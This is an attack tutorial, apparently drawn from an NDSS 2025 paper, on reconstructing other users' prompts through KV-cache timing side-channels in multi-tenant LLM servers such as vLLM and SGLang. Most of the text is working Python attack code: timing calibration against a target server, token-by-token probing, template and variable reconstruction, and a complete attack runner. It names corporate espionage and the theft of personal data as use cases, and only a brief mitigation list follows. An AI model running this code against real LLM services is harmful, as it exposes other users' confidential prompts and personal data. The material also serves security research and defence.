Prompt Leakage via KV Cache Sharing in Multi-tenant LLM Servers
Multi-tenant LLM servers share the KV-cache across users for efficiency. This creates a timing side-channel: by monitoring cache behavior, you can reconstruct other users' prompts in near real time.
Target Frameworks: vLLM, SGLang, LightLLM, DeepSpeed
Attack Flow
How KV-Cache Sharing Works
Think of KV-cache like a shared notepad that the LLM uses to remember what it just processed.
The Basic Idea:
- LLM processes tokens and creates "memory" (KV-cache) for each one
- When multiple users' prompts share a prefix, the server reuses this memory instead of recomputing it
- Cache hits = fast response, cache misses = slow response
- By timing responses, you can figure out what's cached (and what other users asked)
Why Servers Do This:
- Each token needs roughly 0.1–1 MB of KV-cache memory, depending on the model's size, attention layout, and precision (see the sizing sketch after this list)
- GPU memory is expensive and limited
- Sharing cached prefixes across users saves substantial memory and avoids recomputing the prefill for common prefixes
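To make the per-token figure concrete, here is a back-of-the-envelope sizing sketch. The dimensions used (32 layers, 32 KV heads, head size 128, fp16) are assumptions roughly matching a 7B-class model, not measurements from any particular server.

def kv_cache_bytes_per_token(num_layers=32, num_kv_heads=32, head_dim=128, bytes_per_value=2):
    """Rough KV-cache size per token for an assumed 7B-class model in fp16."""
    # One K vector and one V vector per layer, each num_kv_heads * head_dim values
    return 2 * num_layers * num_kv_heads * head_dim * bytes_per_value

print(f"{kv_cache_bytes_per_token() / 2**20:.2f} MiB per token")  # ~0.50 MiB

At roughly half a MiB per token under these assumptions, a 1,000-token shared system prompt ties up about 0.5 GB of GPU memory per copy, which is why servers are so eager to cache it once and reuse it.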
def simple_kv_cache_example():
    """Dead simple example of how KV-cache sharing works"""
    # Imagine these are two user requests
    user1_prompt = "Help me translate this sentence into English"
    user2_prompt = "Help me translate this sentence into French"

    # Server processes user1 first
    user1_tokens = user1_prompt.split()
    kv_cache = {}

    print("Processing User 1:")
    for i, token in enumerate(user1_tokens):
        # Simulate creating KV cache for each token
        cache_key = " ".join(user1_tokens[:i+1])
        kv_cache[cache_key] = f"kv_data_for_{token}"
        print(f" Cached: '{cache_key}'")

    print(f"\nKV Cache now contains {len(kv_cache)} entries")

    # User2 request comes in
    user2_tokens = user2_prompt.split()
    cache_hits = 0
    cache_misses = 0

    print("\nProcessing User 2:")
    for i, token in enumerate(user2_tokens):
        cache_key = " ".join(user2_tokens[:i+1])
        if cache_key in kv_cache:
            print(f"CACHE HIT: '{cache_key}' (fast response)")
            cache_hits += 1
        else:
            print(f"CACHE MISS: '{cache_key}' (slow response)")
            kv_cache[cache_key] = f"kv_data_for_{token}"
            cache_misses += 1

    print(f"\nResults: {cache_hits} hits, {cache_misses} misses")
    print("An attacker can infer User 1's prompt by observing these patterns!")

# Run the example
simple_kv_cache_example()
# Output shows:
# - The first 6 prefix tokens are cache hits (shared between the two prompts)
# - Only the final token ("French" vs "English") is a cache miss
# - The timing difference reveals the shared prefix!
Key Insight: Cache behavior creates a timing side-channel that leaks information about what other users have asked.
How Servers Optimize Cache Sharing
Longest Prefix Match (LPM):
- Server prioritizes requests that share the longest prefix with cached data
- Example: If "Imagine you are an expert" is cached, requests starting with this get priority
- This optimization makes the side-channel even more exploitable
def lpm_scheduling_example():
    """How LPM scheduling works and why it's exploitable"""
    # Current cache contains this prompt
    cached_prompt = "Imagine you are an expert programmer. Write a function to"
    cached_tokens = cached_prompt.split()

    # Three new requests come in
    requests = [
        "Imagine you are an expert programmer. Debug this code",  # 6 token match
        "Imagine you are an expert chef. Make a recipe",          # 5 token match
        "Write a simple hello world program",                     # 0 token match
    ]

    print("LPM Scheduling Priority:")
    for i, request in enumerate(requests):
        request_tokens = request.split()
        # Find longest matching prefix
        match_length = 0
        for j in range(min(len(cached_tokens), len(request_tokens))):
            if cached_tokens[j] == request_tokens[j]:
                match_length += 1
            else:
                break
        # Requests above are ordered by match length, so a higher score means scheduled earlier
        print(f"Request {i+1}: {match_length} token match - Priority {3-i}")
        print(f" '{request}'")

    print("By sending requests with different prefixes and measuring response times,")
    print("you can determine what's currently cached (i.e., what others asked)!")

lpm_scheduling_example()
The Attack
Step 1: Set Up Monitoring
What we're doing: Learning how to detect cache hits vs misses.
Why: We need to distinguish between fast (cached) and slow (uncached) responses.
import time
import requests
import statistics

class CacheMonitor:
    def __init__(self, server_url):
        self.server_url = server_url
        self.baseline_times = []
        self.cache_hit_threshold = None

    def calibrate(self):
        """Learn what cache hits vs misses look like"""
        # Send requests we know will be cache misses (random strings)
        miss_times = []
        for i in range(10):
            random_prompt = f"Random uncached prompt {i} xyz123"
            response_time = self.measure_response_time(random_prompt)
            miss_times.append(response_time)
            time.sleep(0.1)  # Don't overwhelm server

        # Send the same request multiple times (should be cache hits after first)
        hit_times = []
        repeated_prompt = "This prompt will be cached after first request"
        for i in range(10):
            response_time = self.measure_response_time(repeated_prompt)
            if i > 0:  # Skip first request (that's the miss)
                hit_times.append(response_time)
            time.sleep(0.1)

        # Calculate threshold
        avg_miss_time = statistics.mean(miss_times)
        avg_hit_time = statistics.mean(hit_times)
        self.cache_hit_threshold = (avg_miss_time + avg_hit_time) / 2

        print(f" Cache miss avg: {avg_miss_time:.3f}s")
        print(f" Cache hit avg: {avg_hit_time:.3f}s")
        print(f" Threshold: {self.cache_hit_threshold:.3f}s")
        return avg_miss_time > avg_hit_time  # Sanity check
    def measure_response_time(self, prompt):
        """Measure how long the server takes to respond.

        Sketch only: assumes an OpenAI-compatible completions endpoint (as
        exposed by e.g. vLLM or SGLang); the exact path and required payload
        fields (such as a "model" name) depend on the target deployment.
        """
        payload = {"prompt": prompt, "max_tokens": 1}
        start = time.time()
        requests.post(f"{self.server_url}/v1/completions", json=payload, timeout=30)
        return time.time() - start
    def is_cache_hit(self, prompt):
        """Determine if a prompt results in cache hit"""
        response_time = self.measure_response_time(prompt)
        return response_time < self.cache_hit_threshold

    def probe_token_sequence(self, token_sequence):
        """Test if a specific token sequence is cached"""
        prompt = " ".join(token_sequence)
        is_hit = self.is_cache_hit(prompt)
        print(f"Probe: '{prompt[:50]}...' -> {'HIT' if is_hit else 'MISS'}")
        return is_hit

monitor = CacheMonitor("http://llm-server:8000")
if monitor.calibrate():
    print("✅ Calibration successful - ready to attack!")
else:
    print("❌ Calibration failed - server might not be vulnerable")
Step 2: Probe with Candidate Tokens
What we're doing: Testing different token combinations to see what's cached.
Why: Cached tokens reveal what other users have asked.
Simple analogy: Like playing 20 questions, but the speed of the answer tells you if you're on the right track.
class TokenProber:
    def __init__(self, monitor):
        self.monitor = monitor
        self.common_tokens = [
            # Common prompt starters
            "Imagine", "you", "are", "an", "expert", "in",
            "Help", "me", "with", "this", "problem",
            "Write", "a", "function", "that", "can",
            "Translate", "the", "following", "text", "into",
            "Explain", "how", "to", "solve", "this",
            # Common words
            "the", "and", "or", "but", "for", "to", "of", "in", "on", "at",
            # Technical terms
            "code", "program", "algorithm", "data", "system", "network",
            "security", "password", "login", "database", "server"
        ]

    def find_cached_prefix(self, max_length=10):
        """Find the longest cached token sequence"""
        cached_sequence = []
        for position in range(max_length):
            print(f"\nTesting position {position + 1}:")
            found_token = None
            # Try each common token at this position
            for token in self.common_tokens:
                test_sequence = cached_sequence + [token]
                if self.monitor.probe_token_sequence(test_sequence):
                    print(f"Found token: '{token}'")
                    found_token = token
                    break
                else:
                    print(f"Not cached: '{token}'")
            if found_token:
                cached_sequence.append(found_token)
                print(f"Current sequence: {' '.join(cached_sequence)}")
            else:
                print(f"No more tokens found at position {position + 1}")
                break
        return cached_sequence

    def refine_sequence(self, base_sequence):
        """Try to find more specific tokens after the base sequence"""
        print(f"\nRefining sequence: '{' '.join(base_sequence)}'")
        # Try common continuations
        continuations = [
            ["programmer", "developer", "engineer", "coder"],
            ["write", "create", "build", "develop", "make"],
            ["function", "method", "class", "script", "program"],
            ["that", "which", "to", "for", "with"],
            ["can", "will", "should", "must", "could"]
        ]
        refined_sequence = base_sequence.copy()
        for continuation_set in continuations:
            found_continuation = None
            for token in continuation_set:
                test_sequence = refined_sequence + [token]
                if self.monitor.probe_token_sequence(test_sequence):
                    print(f"Found continuation: '{token}'")
                    found_continuation = token
                    break
            if found_continuation:
                refined_sequence.append(found_continuation)
            else:
                break
        return refined_sequence

prober = TokenProber(monitor)
cached_prefix = prober.find_cached_prefix()
if cached_prefix:
    refined_sequence = prober.refine_sequence(cached_prefix)
    print(f"\nReconstructed prompt prefix: '{' '.join(refined_sequence)}'")
Step 3: Reconstruct Full Prompts
What we're doing: Piecing together the complete prompt from the cached tokens.
Why: This gives us the full sensitive information other users submitted.
class PromptReconstructor:
    def __init__(self, monitor):
        self.monitor = monitor
        self.vocabulary = self.load_vocabulary()

    def load_vocabulary(self):
        """Load common words and phrases for reconstruction"""
        return {
            'starters': [
                "Imagine you are", "Help me", "Write a", "Create a",
                "Explain how", "Show me", "Tell me", "Generate"
            ],
            'roles': [
                "expert programmer", "security analyst", "data scientist",
                "system administrator", "network engineer", "AI researcher"
            ],
            'actions': [
                "write code", "debug this", "analyze data", "solve problem",
                "create script", "build system", "design algorithm"
            ],
            'objects': [
                "function", "class", "script", "program", "algorithm",
                "database", "network", "system", "application"
            ],
            'connectors': ["that", "which", "to", "for", "with", "in", "on", "at"],
            'endings': ["please", "thanks", "help", "urgent", "asap"]
        }

    def reconstruct_template(self, known_prefix):
        """Reconstruct prompt template from known prefix"""
        print(f"🔨 Reconstructing template from: '{' '.join(known_prefix)}'")
        template_parts = [known_prefix]
        current_sequence = known_prefix.copy()
        # Try to extend with common patterns
        for category, words in self.vocabulary.items():
            if category == 'starters':
                continue  # Already have the start
            print(f"\nTrying {category}:")
            found_extension = []
            for phrase in words:
                phrase_tokens = phrase.split()
                test_sequence = current_sequence + phrase_tokens
                if self.monitor.probe_token_sequence(test_sequence):
                    print(f"Found {category}: '{phrase}'")
                    found_extension = phrase_tokens
                    break
                else:
                    print(f"Not found: '{phrase}'")
            if found_extension:
                current_sequence.extend(found_extension)
                template_parts.append(found_extension)
        return current_sequence

    def extract_variables(self, template):
        """Try to extract variable parts of the prompt"""
        print(f"\nLooking for variable content in template...")
        # Common variable patterns
        variable_patterns = [
            ["this", "code"], ["this", "problem"], ["this", "data"],
            ["following", "text"], ["below", "information"],
            ["my", "project"], ["our", "system"], ["the", "issue"]
        ]
        variables_found = []
        for pattern in variable_patterns:
            test_sequence = template + pattern
            if self.monitor.probe_token_sequence(test_sequence):
                print(f"Found variable pattern: '{' '.join(pattern)}'")
                variables_found.append(pattern)
        return variables_found

    def full_reconstruction(self, max_attempts=50):
        """Complete prompt reconstruction process"""
        print("Starting full prompt reconstruction...")
        # Step 1: Find initial cached prefix
        initial_probe = TokenProber(self.monitor)
        base_prefix = initial_probe.find_cached_prefix()
        if not base_prefix:
            print("No cached tokens found")
            return None
        # Step 2: Reconstruct template
        full_template = self.reconstruct_template(base_prefix)
        # Step 3: Extract variables
        variables = self.extract_variables(full_template)
        # Step 4: Attempt to reconstruct full prompt
        reconstructed_prompt = " ".join(full_template)
        if variables:
            reconstructed_prompt += " [VARIABLE_CONTENT]"
        print(f"\nRECONSTRUCTION COMPLETE:")
        print(f"Template: '{' '.join(full_template)}'")
        print(f"Variables: {variables}")
        print(f"Full prompt: '{reconstructed_prompt}'")
        return {
            'template': full_template,
            'variables': variables,
            'full_prompt': reconstructed_prompt
        }

# Complete attack example
def run_complete_attack(server_url):
    """Run the complete KV-cache side-channel attack"""
    print("Starting KV-Cache Side-Channel Attack")
    # Step 1: Set up monitoring
    monitor = CacheMonitor(server_url)
    if not monitor.calibrate():
        print("Attack failed - server not vulnerable")
        return None
    # Step 2: Reconstruct prompts
    reconstructor = PromptReconstructor(monitor)
    result = reconstructor.full_reconstruction()
    if result:
        print("\nAttack successful!")
        return result
    else:
        print("\nAttack failed - no prompts reconstructed")
        return None

# Usage
# result = run_complete_attack("http://target-llm-server:8000")
The Big Picture:
- Monitor = Learn to detect cache hits vs misses through timing
- Probe = Test token combinations to find what's cached
- Reconstruct = Piece together the full prompts from cached fragments
Attack Scenarios
Template Extraction
Target: Extract the structure of prompts other users are sending.
Use Case: Corporate espionage, competitive intelligence, understanding AI usage patterns.
Input Extraction
Target: Extract specific sensitive data from other users' prompts.
Use Case: Stealing proprietary information, personal data, confidential documents.
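A minimal sketch of input extraction, reusing the CacheMonitor from Step 1: once the surrounding template is known, you enumerate candidate values for the variable slot and check which continuation is already cached. The prefix and candidate list below are purely illustrative.

def extract_variable_value(monitor, known_prefix_tokens, candidate_values):
    """Probe candidate fillers for a known template's variable slot."""
    for value in candidate_values:
        test_sequence = known_prefix_tokens + value.split()
        # A cache hit means another user already submitted this exact continuation
        if monitor.probe_token_sequence(test_sequence):
            return value
    return None

# Illustrative usage: which department did the victim's prompt mention?
# leaked = extract_variable_value(
#     monitor,
#     "Summarize the quarterly report for the".split(),
#     ["finance department", "legal department", "sales department"],
# )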
Blind Reconstruction
Target: Reconstruct prompts with no prior knowledge.
Use Case: General surveillance, discovering unknown attack vectors.
Mitigation
- Isolate the KV-cache per user or trust domain so prefixes are never shared across tenants (a minimal sketch follows this list).
- Add random delays to mask cache-timing differences.
- Rate-limit requests to make rapid probing impractical.
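A minimal sketch of the first mitigation, assuming a serving stack whose prefix-cache lookups are keyed by a hash of the token prefix; the cache_key_for helper and tenant_id parameter are illustrative, not any framework's actual API. Salting the key with a per-tenant identifier means one tenant's requests can never hit another tenant's cached prefixes, closing the cross-user timing channel at the cost of reduced cache reuse.

import hashlib

def cache_key_for(token_ids, tenant_id):
    """Illustrative prefix-cache key: salting with the tenant ID isolates caches per tenant."""
    h = hashlib.sha256()
    h.update(tenant_id.encode())                      # per-tenant salt -> no cross-tenant hits
    h.update(",".join(map(str, token_ids)).encode())  # the token prefix itself
    return h.hexdigest()

# The same token prefix maps to different cache entries for different tenants:
prefix = [101, 2054, 2003]
assert cache_key_for(prefix, "tenant-A") != cache_key_for(prefix, "tenant-B")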
References
[1] Wu, G., et al. (2025). I Know What You Asked: Prompt Leakage via KV-Cache Sharing in Multi-Tenant LLM Serving. NDSS 2025. https://www.ndss-symposium.org/wp-content/uploads/2025-1772-paper.pdf